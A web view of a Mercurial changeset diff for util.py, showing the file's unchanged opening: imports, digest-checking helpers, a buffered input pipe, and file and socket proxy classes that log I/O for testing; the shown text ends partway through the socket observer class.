util: whitelist apfs for hardlink support...
Augie Fackler
r37400:de9f9f88 default
@@ -1,3859 +1,3860
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import tempfile
35 35 import time
36 36 import traceback
37 37 import warnings
38 38 import zlib
39 39
40 40 from . import (
41 41 encoding,
42 42 error,
43 43 i18n,
44 44 node as nodemod,
45 45 policy,
46 46 pycompat,
47 47 urllibcompat,
48 48 )
49 49 from .utils import (
50 50 dateutil,
51 51 procutil,
52 52 stringutil,
53 53 )
54 54
55 55 base85 = policy.importmod(r'base85')
56 56 osutil = policy.importmod(r'osutil')
57 57 parsers = policy.importmod(r'parsers')
58 58
59 59 b85decode = base85.b85decode
60 60 b85encode = base85.b85encode
61 61
62 62 cookielib = pycompat.cookielib
63 63 empty = pycompat.empty
64 64 httplib = pycompat.httplib
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def _rapply(f, xs):
139 139 if xs is None:
140 140 # assume None means non-value of optional data
141 141 return xs
142 142 if isinstance(xs, (list, set, tuple)):
143 143 return type(xs)(_rapply(f, x) for x in xs)
144 144 if isinstance(xs, dict):
145 145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 146 return f(xs)
147 147
148 148 def rapply(f, xs):
149 149 """Apply function recursively to every item preserving the data structure
150 150
151 151 >>> def f(x):
152 152 ... return 'f(%s)' % x
153 153 >>> rapply(f, None) is None
154 154 True
155 155 >>> rapply(f, 'a')
156 156 'f(a)'
157 157 >>> rapply(f, {'a'}) == {'f(a)'}
158 158 True
159 159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161 161
162 162 >>> xs = [object()]
163 163 >>> rapply(pycompat.identity, xs) is xs
164 164 True
165 165 """
166 166 if f is pycompat.identity:
167 167 # fast path mainly for py2
168 168 return xs
169 169 return _rapply(f, xs)
170 170
171 171 def bitsfrom(container):
172 172 bits = 0
173 173 for bit in container:
174 174 bits |= bit
175 175 return bits
176 176
177 177 # Python 2.6 still has deprecation warnings enabled by default. We do not want
178 178 # to display anything to a standard user, so detect if we are running tests
179 179 # and only use Python deprecation warnings in this case.
180 180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, a module name set through PYTHONWARNINGS is matched exactly, so
186 186 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS thing useless for our use case.
188 188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 194 r'mercurial')
195 195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 196 DeprecationWarning, r'mercurial')
197 197
198 198 def nouideprecwarn(msg, version, stacklevel=1):
199 199 """Issue an python native deprecation warning
200 200
201 201 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
202 202 """
203 203 if _dowarn:
204 204 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
205 205 " update your code.)") % version
206 206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 207
208 208 DIGESTS = {
209 209 'md5': hashlib.md5,
210 210 'sha1': hashlib.sha1,
211 211 'sha512': hashlib.sha512,
212 212 }
213 213 # List of digest types from strongest to weakest
214 214 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
215 215
216 216 for k in DIGESTS_BY_STRENGTH:
217 217 assert k in DIGESTS
218 218
219 219 class digester(object):
220 220 """helper to compute digests.
221 221
222 222 This helper can be used to compute one or more digests given their name.
223 223
224 224 >>> d = digester([b'md5', b'sha1'])
225 225 >>> d.update(b'foo')
226 226 >>> [k for k in sorted(d)]
227 227 ['md5', 'sha1']
228 228 >>> d[b'md5']
229 229 'acbd18db4cc2f85cedef654fccc4a4d8'
230 230 >>> d[b'sha1']
231 231 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
232 232 >>> digester.preferred([b'md5', b'sha1'])
233 233 'sha1'
234 234 """
235 235
236 236 def __init__(self, digests, s=''):
237 237 self._hashes = {}
238 238 for k in digests:
239 239 if k not in DIGESTS:
240 240 raise error.Abort(_('unknown digest type: %s') % k)
241 241 self._hashes[k] = DIGESTS[k]()
242 242 if s:
243 243 self.update(s)
244 244
245 245 def update(self, data):
246 246 for h in self._hashes.values():
247 247 h.update(data)
248 248
249 249 def __getitem__(self, key):
250 250 if key not in DIGESTS:
251 251 raise error.Abort(_('unknown digest type: %s') % key)
252 252 return nodemod.hex(self._hashes[key].digest())
253 253
254 254 def __iter__(self):
255 255 return iter(self._hashes)
256 256
257 257 @staticmethod
258 258 def preferred(supported):
259 259 """returns the strongest digest type in both supported and DIGESTS."""
260 260
261 261 for k in DIGESTS_BY_STRENGTH:
262 262 if k in supported:
263 263 return k
264 264 return None
265 265
266 266 class digestchecker(object):
267 267 """file handle wrapper that additionally checks content against a given
268 268 size and digests.
269 269
270 270 d = digestchecker(fh, size, {'md5': '...'})
271 271
272 272 When multiple digests are given, all of them are validated.
273 273 """
274 274
275 275 def __init__(self, fh, size, digests):
276 276 self._fh = fh
277 277 self._size = size
278 278 self._got = 0
279 279 self._digests = dict(digests)
280 280 self._digester = digester(self._digests.keys())
281 281
282 282 def read(self, length=-1):
283 283 content = self._fh.read(length)
284 284 self._digester.update(content)
285 285 self._got += len(content)
286 286 return content
287 287
288 288 def validate(self):
289 289 if self._size != self._got:
290 290 raise error.Abort(_('size mismatch: expected %d, got %d') %
291 291 (self._size, self._got))
292 292 for k, v in self._digests.items():
293 293 if v != self._digester[k]:
294 294 # i18n: first parameter is a digest name
295 295 raise error.Abort(_('%s mismatch: expected %s, got %s') %
296 296 (k, v, self._digester[k]))
297 297
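# A minimal digestchecker sketch (illustrative, not run as a doctest; the md5
# value is the digest of b'foo' shown in the digester doctest above):
#
#   >>> fh = bytesio(b'foo')
#   >>> checked = digestchecker(fh, 3, {'md5': 'acbd18db4cc2f85cedef654fccc4a4d8'})
#   >>> checked.read() == b'foo'
#   True
#   >>> checked.validate()  # raises error.Abort on size or digest mismatch
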
298 298 try:
299 299 buffer = buffer
300 300 except NameError:
301 301 def buffer(sliceable, offset=0, length=None):
302 302 if length is not None:
303 303 return memoryview(sliceable)[offset:offset + length]
304 304 return memoryview(sliceable)[offset:]
305 305
306 306 _chunksize = 4096
307 307
308 308 class bufferedinputpipe(object):
309 309 """a manually buffered input pipe
310 310
311 311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 312 the same time. We cannot probe the buffer state and select will not detect
313 313 that data are ready to read if they are already buffered.
314 314
315 315 This class lets us work around that by implementing its own buffering
316 316 (allowing efficient readline) while offering a way to know if the buffer is
317 317 empty from the output (allowing collaboration of the buffer with polling).
318 318
319 319 This class lives in the 'util' module because it makes use of the 'os'
320 320 module from the python stdlib.
321 321 """
322 322 def __new__(cls, fh):
323 323 # If we receive a fileobjectproxy, we need to use a variation of this
324 324 # class that notifies observers about activity.
325 325 if isinstance(fh, fileobjectproxy):
326 326 cls = observedbufferedinputpipe
327 327
328 328 return super(bufferedinputpipe, cls).__new__(cls)
329 329
330 330 def __init__(self, input):
331 331 self._input = input
332 332 self._buffer = []
333 333 self._eof = False
334 334 self._lenbuf = 0
335 335
336 336 @property
337 337 def hasbuffer(self):
338 338 """True is any data is currently buffered
339 339
340 340 This will be used externally a pre-step for polling IO. If there is
341 341 already data then no polling should be set in place."""
342 342 return bool(self._buffer)
343 343
344 344 @property
345 345 def closed(self):
346 346 return self._input.closed
347 347
348 348 def fileno(self):
349 349 return self._input.fileno()
350 350
351 351 def close(self):
352 352 return self._input.close()
353 353
354 354 def read(self, size):
355 355 while (not self._eof) and (self._lenbuf < size):
356 356 self._fillbuffer()
357 357 return self._frombuffer(size)
358 358
359 359 def readline(self, *args, **kwargs):
360 360 if 1 < len(self._buffer):
361 361 # this should not happen because both read and readline end with a
362 362 # _frombuffer call that collapses it.
363 363 self._buffer = [''.join(self._buffer)]
364 364 self._lenbuf = len(self._buffer[0])
365 365 lfi = -1
366 366 if self._buffer:
367 367 lfi = self._buffer[-1].find('\n')
368 368 while (not self._eof) and lfi < 0:
369 369 self._fillbuffer()
370 370 if self._buffer:
371 371 lfi = self._buffer[-1].find('\n')
372 372 size = lfi + 1
373 373 if lfi < 0: # end of file
374 374 size = self._lenbuf
375 375 elif 1 < len(self._buffer):
376 376 # we need to take previous chunks into account
377 377 size += self._lenbuf - len(self._buffer[-1])
378 378 return self._frombuffer(size)
379 379
380 380 def _frombuffer(self, size):
381 381 """return at most 'size' data from the buffer
382 382
383 383 The data are removed from the buffer."""
384 384 if size == 0 or not self._buffer:
385 385 return ''
386 386 buf = self._buffer[0]
387 387 if 1 < len(self._buffer):
388 388 buf = ''.join(self._buffer)
389 389
390 390 data = buf[:size]
391 391 buf = buf[len(data):]
392 392 if buf:
393 393 self._buffer = [buf]
394 394 self._lenbuf = len(buf)
395 395 else:
396 396 self._buffer = []
397 397 self._lenbuf = 0
398 398 return data
399 399
400 400 def _fillbuffer(self):
401 401 """read data to the buffer"""
402 402 data = os.read(self._input.fileno(), _chunksize)
403 403 if not data:
404 404 self._eof = True
405 405 else:
406 406 self._lenbuf += len(data)
407 407 self._buffer.append(data)
408 408
409 409 return data
410 410
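# Illustrative sketch of the intended polling collaboration (assumes 'pipe' is
# a readable fileobj from a child process; not run as a doctest):
#
#   p = bufferedinputpipe(pipe)
#   while not p.closed:
#       if not p.hasbuffer:
#           poll([p.fileno()])  # only block in poll when our buffer is empty
#       line = p.readline()
#       if not line:
#           break
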
411 411 def mmapread(fp):
412 412 try:
413 413 fd = getattr(fp, 'fileno', lambda: fp)()
414 414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 415 except ValueError:
416 416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 417 # if the file is empty, and if so, return an empty buffer.
418 418 if os.fstat(fd).st_size == 0:
419 419 return ''
420 420 raise
421 421
422 422 class fileobjectproxy(object):
423 423 """A proxy around file objects that tells a watcher when events occur.
424 424
425 425 This type is intended to only be used for testing purposes. Think hard
426 426 before using it in important code.
427 427 """
428 428 __slots__ = (
429 429 r'_orig',
430 430 r'_observer',
431 431 )
432 432
433 433 def __init__(self, fh, observer):
434 434 object.__setattr__(self, r'_orig', fh)
435 435 object.__setattr__(self, r'_observer', observer)
436 436
437 437 def __getattribute__(self, name):
438 438 ours = {
439 439 r'_observer',
440 440
441 441 # IOBase
442 442 r'close',
443 443 # closed is a property
444 444 r'fileno',
445 445 r'flush',
446 446 r'isatty',
447 447 r'readable',
448 448 r'readline',
449 449 r'readlines',
450 450 r'seek',
451 451 r'seekable',
452 452 r'tell',
453 453 r'truncate',
454 454 r'writable',
455 455 r'writelines',
456 456 # RawIOBase
457 457 r'read',
458 458 r'readall',
459 459 r'readinto',
460 460 r'write',
461 461 # BufferedIOBase
462 462 # raw is a property
463 463 r'detach',
464 464 # read defined above
465 465 r'read1',
466 466 # readinto defined above
467 467 # write defined above
468 468 }
469 469
470 470 # We only observe some methods.
471 471 if name in ours:
472 472 return object.__getattribute__(self, name)
473 473
474 474 return getattr(object.__getattribute__(self, r'_orig'), name)
475 475
476 476 def __nonzero__(self):
477 477 return bool(object.__getattribute__(self, r'_orig'))
478 478
479 479 __bool__ = __nonzero__
480 480
481 481 def __delattr__(self, name):
482 482 return delattr(object.__getattribute__(self, r'_orig'), name)
483 483
484 484 def __setattr__(self, name, value):
485 485 return setattr(object.__getattribute__(self, r'_orig'), name, value)
486 486
487 487 def __iter__(self):
488 488 return object.__getattribute__(self, r'_orig').__iter__()
489 489
490 490 def _observedcall(self, name, *args, **kwargs):
491 491 # Call the original object.
492 492 orig = object.__getattribute__(self, r'_orig')
493 493 res = getattr(orig, name)(*args, **kwargs)
494 494
495 495 # Call a method on the observer of the same name with arguments
496 496 # so it can react, log, etc.
497 497 observer = object.__getattribute__(self, r'_observer')
498 498 fn = getattr(observer, name, None)
499 499 if fn:
500 500 fn(res, *args, **kwargs)
501 501
502 502 return res
503 503
504 504 def close(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'close', *args, **kwargs)
507 507
508 508 def fileno(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'fileno', *args, **kwargs)
511 511
512 512 def flush(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'flush', *args, **kwargs)
515 515
516 516 def isatty(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'isatty', *args, **kwargs)
519 519
520 520 def readable(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'readable', *args, **kwargs)
523 523
524 524 def readline(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'readline', *args, **kwargs)
527 527
528 528 def readlines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'readlines', *args, **kwargs)
531 531
532 532 def seek(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'seek', *args, **kwargs)
535 535
536 536 def seekable(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'seekable', *args, **kwargs)
539 539
540 540 def tell(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'tell', *args, **kwargs)
543 543
544 544 def truncate(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'truncate', *args, **kwargs)
547 547
548 548 def writable(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'writable', *args, **kwargs)
551 551
552 552 def writelines(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'writelines', *args, **kwargs)
555 555
556 556 def read(self, *args, **kwargs):
557 557 return object.__getattribute__(self, r'_observedcall')(
558 558 r'read', *args, **kwargs)
559 559
560 560 def readall(self, *args, **kwargs):
561 561 return object.__getattribute__(self, r'_observedcall')(
562 562 r'readall', *args, **kwargs)
563 563
564 564 def readinto(self, *args, **kwargs):
565 565 return object.__getattribute__(self, r'_observedcall')(
566 566 r'readinto', *args, **kwargs)
567 567
568 568 def write(self, *args, **kwargs):
569 569 return object.__getattribute__(self, r'_observedcall')(
570 570 r'write', *args, **kwargs)
571 571
572 572 def detach(self, *args, **kwargs):
573 573 return object.__getattribute__(self, r'_observedcall')(
574 574 r'detach', *args, **kwargs)
575 575
576 576 def read1(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'read1', *args, **kwargs)
579 579
580 580 class observedbufferedinputpipe(bufferedinputpipe):
581 581 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
582 582
583 583 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
584 584 bypass ``fileobjectproxy``. Because of this, we need to make
585 585 ``bufferedinputpipe`` aware of these operations.
586 586
587 587 This variation of ``bufferedinputpipe`` can notify observers about
588 588 ``os.read()`` events. It also re-publishes other events, such as
589 589 ``read()`` and ``readline()``.
590 590 """
591 591 def _fillbuffer(self):
592 592 res = super(observedbufferedinputpipe, self)._fillbuffer()
593 593
594 594 fn = getattr(self._input._observer, r'osread', None)
595 595 if fn:
596 596 fn(res, _chunksize)
597 597
598 598 return res
599 599
600 600 # We use different observer methods because the operation isn't
601 601 # performed on the actual file object but on us.
602 602 def read(self, size):
603 603 res = super(observedbufferedinputpipe, self).read(size)
604 604
605 605 fn = getattr(self._input._observer, r'bufferedread', None)
606 606 if fn:
607 607 fn(res, size)
608 608
609 609 return res
610 610
611 611 def readline(self, *args, **kwargs):
612 612 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
613 613
614 614 fn = getattr(self._input._observer, r'bufferedreadline', None)
615 615 if fn:
616 616 fn(res)
617 617
618 618 return res
619 619
620 620 PROXIED_SOCKET_METHODS = {
621 621 r'makefile',
622 622 r'recv',
623 623 r'recvfrom',
624 624 r'recvfrom_into',
625 625 r'recv_into',
626 626 r'send',
627 627 r'sendall',
628 628 r'sendto',
629 629 r'setblocking',
630 630 r'settimeout',
631 631 r'gettimeout',
632 632 r'setsockopt',
633 633 }
634 634
635 635 class socketproxy(object):
636 636 """A proxy around a socket that tells a watcher when events occur.
637 637
638 638 This is like ``fileobjectproxy`` except for sockets.
639 639
640 640 This type is intended to only be used for testing purposes. Think hard
641 641 before using it in important code.
642 642 """
643 643 __slots__ = (
644 644 r'_orig',
645 645 r'_observer',
646 646 )
647 647
648 648 def __init__(self, sock, observer):
649 649 object.__setattr__(self, r'_orig', sock)
650 650 object.__setattr__(self, r'_observer', observer)
651 651
652 652 def __getattribute__(self, name):
653 653 if name in PROXIED_SOCKET_METHODS:
654 654 return object.__getattribute__(self, name)
655 655
656 656 return getattr(object.__getattribute__(self, r'_orig'), name)
657 657
658 658 def __delattr__(self, name):
659 659 return delattr(object.__getattribute__(self, r'_orig'), name)
660 660
661 661 def __setattr__(self, name, value):
662 662 return setattr(object.__getattribute__(self, r'_orig'), name, value)
663 663
664 664 def __nonzero__(self):
665 665 return bool(object.__getattribute__(self, r'_orig'))
666 666
667 667 __bool__ = __nonzero__
668 668
669 669 def _observedcall(self, name, *args, **kwargs):
670 670 # Call the original object.
671 671 orig = object.__getattribute__(self, r'_orig')
672 672 res = getattr(orig, name)(*args, **kwargs)
673 673
674 674 # Call a method on the observer of the same name with arguments
675 675 # so it can react, log, etc.
676 676 observer = object.__getattribute__(self, r'_observer')
677 677 fn = getattr(observer, name, None)
678 678 if fn:
679 679 fn(res, *args, **kwargs)
680 680
681 681 return res
682 682
683 683 def makefile(self, *args, **kwargs):
684 684 res = object.__getattribute__(self, r'_observedcall')(
685 685 r'makefile', *args, **kwargs)
686 686
687 687 # The file object may be used for I/O. So we turn it into a
688 688 # proxy using our observer.
689 689 observer = object.__getattribute__(self, r'_observer')
690 690 return makeloggingfileobject(observer.fh, res, observer.name,
691 691 reads=observer.reads,
692 692 writes=observer.writes,
693 693 logdata=observer.logdata,
694 694 logdataapis=observer.logdataapis)
695 695
696 696 def recv(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'recv', *args, **kwargs)
699 699
700 700 def recvfrom(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'recvfrom', *args, **kwargs)
703 703
704 704 def recvfrom_into(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'recvfrom_into', *args, **kwargs)
707 707
708 708 def recv_into(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'recv_into', *args, **kwargs)
711 711
712 712 def send(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'send', *args, **kwargs)
715 715
716 716 def sendall(self, *args, **kwargs):
717 717 return object.__getattribute__(self, r'_observedcall')(
718 718 r'sendall', *args, **kwargs)
719 719
720 720 def sendto(self, *args, **kwargs):
721 721 return object.__getattribute__(self, r'_observedcall')(
722 722 r'sendto', *args, **kwargs)
723 723
724 724 def setblocking(self, *args, **kwargs):
725 725 return object.__getattribute__(self, r'_observedcall')(
726 726 r'setblocking', *args, **kwargs)
727 727
728 728 def settimeout(self, *args, **kwargs):
729 729 return object.__getattribute__(self, r'_observedcall')(
730 730 r'settimeout', *args, **kwargs)
731 731
732 732 def gettimeout(self, *args, **kwargs):
733 733 return object.__getattribute__(self, r'_observedcall')(
734 734 r'gettimeout', *args, **kwargs)
735 735
736 736 def setsockopt(self, *args, **kwargs):
737 737 return object.__getattribute__(self, r'_observedcall')(
738 738 r'setsockopt', *args, **kwargs)
739 739
740 740 class baseproxyobserver(object):
741 741 def _writedata(self, data):
742 742 if not self.logdata:
743 743 if self.logdataapis:
744 744 self.fh.write('\n')
745 745 self.fh.flush()
746 746 return
747 747
748 748 # Simple case writes all data on a single line.
749 749 if b'\n' not in data:
750 750 if self.logdataapis:
751 751 self.fh.write(': %s\n' % stringutil.escapestr(data))
752 752 else:
753 753 self.fh.write('%s> %s\n'
754 754 % (self.name, stringutil.escapestr(data)))
755 755 self.fh.flush()
756 756 return
757 757
758 758 # Data with newlines is written to multiple lines.
759 759 if self.logdataapis:
760 760 self.fh.write(':\n')
761 761
762 762 lines = data.splitlines(True)
763 763 for line in lines:
764 764 self.fh.write('%s> %s\n'
765 765 % (self.name, stringutil.escapestr(line)))
766 766 self.fh.flush()
767 767
768 768 class fileobjectobserver(baseproxyobserver):
769 769 """Logs file object activity."""
770 770 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
771 771 logdataapis=True):
772 772 self.fh = fh
773 773 self.name = name
774 774 self.logdata = logdata
775 775 self.logdataapis = logdataapis
776 776 self.reads = reads
777 777 self.writes = writes
778 778
779 779 def read(self, res, size=-1):
780 780 if not self.reads:
781 781 return
782 782 # Python 3 can return None from reads at EOF instead of empty strings.
783 783 if res is None:
784 784 res = ''
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
788 788
789 789 self._writedata(res)
790 790
791 791 def readline(self, res, limit=-1):
792 792 if not self.reads:
793 793 return
794 794
795 795 if self.logdataapis:
796 796 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
797 797
798 798 self._writedata(res)
799 799
800 800 def readinto(self, res, dest):
801 801 if not self.reads:
802 802 return
803 803
804 804 if self.logdataapis:
805 805 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
806 806 res))
807 807
808 808 data = dest[0:res] if res is not None else b''
809 809 self._writedata(data)
810 810
811 811 def write(self, res, data):
812 812 if not self.writes:
813 813 return
814 814
815 815 # Python 2 returns None from some write() calls. Python 3 (reasonably)
816 816 # returns the integer bytes written.
817 817 if res is None and data:
818 818 res = len(data)
819 819
820 820 if self.logdataapis:
821 821 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
822 822
823 823 self._writedata(data)
824 824
825 825 def flush(self, res):
826 826 if not self.writes:
827 827 return
828 828
829 829 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
830 830
831 831 # For observedbufferedinputpipe.
832 832 def bufferedread(self, res, size):
833 833 if not self.reads:
834 834 return
835 835
836 836 if self.logdataapis:
837 837 self.fh.write('%s> bufferedread(%d) -> %d' % (
838 838 self.name, size, len(res)))
839 839
840 840 self._writedata(res)
841 841
842 842 def bufferedreadline(self, res):
843 843 if not self.reads:
844 844 return
845 845
846 846 if self.logdataapis:
847 847 self.fh.write('%s> bufferedreadline() -> %d' % (
848 848 self.name, len(res)))
849 849
850 850 self._writedata(res)
851 851
852 852 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
853 853 logdata=False, logdataapis=True):
854 854 """Turn a file object into a logging file object."""
855 855
856 856 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
857 857 logdata=logdata, logdataapis=logdataapis)
858 858 return fileobjectproxy(fh, observer)
859 859
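# Illustrative sketch (not run as a doctest): wrap a file object so reads are
# logged to stderr; the b'data' file name here is an arbitrary assumption.
#
#   fh = makeloggingfileobject(procutil.stderr, posixfile(b'data', 'rb'),
#                              b'data', writes=False, logdata=True)
#   fh.read(10)  # logs "data> read(10) -> <n>" plus the escaped payload
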
860 860 class socketobserver(baseproxyobserver):
861 861 """Logs socket activity."""
862 862 def __init__(self, fh, name, reads=True, writes=True, states=True,
863 863 logdata=False, logdataapis=True):
864 864 self.fh = fh
865 865 self.name = name
866 866 self.reads = reads
867 867 self.writes = writes
868 868 self.states = states
869 869 self.logdata = logdata
870 870 self.logdataapis = logdataapis
871 871
872 872 def makefile(self, res, mode=None, bufsize=None):
873 873 if not self.states:
874 874 return
875 875
876 876 self.fh.write('%s> makefile(%r, %r)\n' % (
877 877 self.name, mode, bufsize))
878 878
879 879 def recv(self, res, size, flags=0):
880 880 if not self.reads:
881 881 return
882 882
883 883 if self.logdataapis:
884 884 self.fh.write('%s> recv(%d, %d) -> %d' % (
885 885 self.name, size, flags, len(res)))
886 886 self._writedata(res)
887 887
888 888 def recvfrom(self, res, size, flags=0):
889 889 if not self.reads:
890 890 return
891 891
892 892 if self.logdataapis:
893 893 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
894 894 self.name, size, flags, len(res[0])))
895 895
896 896 self._writedata(res[0])
897 897
898 898 def recvfrom_into(self, res, buf, size, flags=0):
899 899 if not self.reads:
900 900 return
901 901
902 902 if self.logdataapis:
903 903 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
904 904 self.name, size, flags, res[0]))
905 905
906 906 self._writedata(buf[0:res[0]])
907 907
908 908 def recv_into(self, res, buf, size=0, flags=0):
909 909 if not self.reads:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
914 914 self.name, size, flags, res))
915 915
916 916 self._writedata(buf[0:res])
917 917
918 918 def send(self, res, data, flags=0):
919 919 if not self.writes:
920 920 return
921 921
922 922 self.fh.write('%s> send(%d, %d) -> %d' % (
923 923 self.name, len(data), flags, res))
924 924 self._writedata(data)
925 925
926 926 def sendall(self, res, data, flags=0):
927 927 if not self.writes:
928 928 return
929 929
930 930 if self.logdataapis:
931 931 # Returns None on success. So don't bother reporting return value.
932 932 self.fh.write('%s> sendall(%d, %d)' % (
933 933 self.name, len(data), flags))
934 934
935 935 self._writedata(data)
936 936
937 937 def sendto(self, res, data, flagsoraddress, address=None):
938 938 if not self.writes:
939 939 return
940 940
941 941 if address:
942 942 flags = flagsoraddress
943 943 else:
944 944 flags = 0
945 945
946 946 if self.logdataapis:
947 947 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
948 948 self.name, len(data), flags, address, res))
949 949
950 950 self._writedata(data)
951 951
952 952 def setblocking(self, res, flag):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
957 957
958 958 def settimeout(self, res, value):
959 959 if not self.states:
960 960 return
961 961
962 962 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
963 963
964 964 def gettimeout(self, res):
965 965 if not self.states:
966 966 return
967 967
968 968 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
969 969
970 970 def setsockopt(self, res, level, optname, value):
971 971 if not self.states:
972 972 return
973 973
